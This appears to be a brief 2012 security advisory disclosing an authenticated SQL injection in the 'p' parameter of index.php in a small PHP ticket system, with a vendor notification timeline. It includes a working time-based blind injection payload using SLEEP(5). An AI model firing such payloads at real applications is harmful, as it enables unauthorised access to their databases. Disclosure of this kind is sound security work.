PHP Ticket System is a small PHP MySQL trouble ticket or work
ordersystem that is a work in progress.
The 'p' parameter on index.php is vulnerable to SQL Injection.
A user must be signed in to perform this attack.
http://localhost/index.php?p=[SQLi]&id=211&_=1334627588812
http://localhost/index.php?p=edit_ticket' AND SLEEP(5) AND
'yoUg'='yoUg&id=211&_=1334627588812
4/16/12 - Vendor Notified
4/17/12 - Vendor reponse, will be fixed in next release
4/24/12 - Disclosure